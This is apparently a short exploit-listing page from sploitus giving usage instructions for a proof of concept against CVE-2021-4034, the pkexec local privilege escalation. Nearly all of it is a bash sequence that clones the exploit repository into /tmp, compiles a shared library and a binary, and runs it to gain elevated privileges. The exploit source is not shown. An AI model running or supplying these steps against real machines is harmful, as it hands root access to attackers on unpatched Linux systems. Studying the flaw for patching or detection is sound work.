Share
## https://sploitus.com/exploit?id=D799FF8D-56A7-56F9-BF28-DA079A03E761
# f_poc_cve-2021-4034

## usage

```bash
cd /tmp
git clone https://github.com/jcatala/f_poc_cve-2021-4034/
cd f_poc_cve-2021-4034
gcc -fPIC -c ISO646.c
ld -shared -shared ISO646.o -o s.so
gcc f.c -o f
./f
```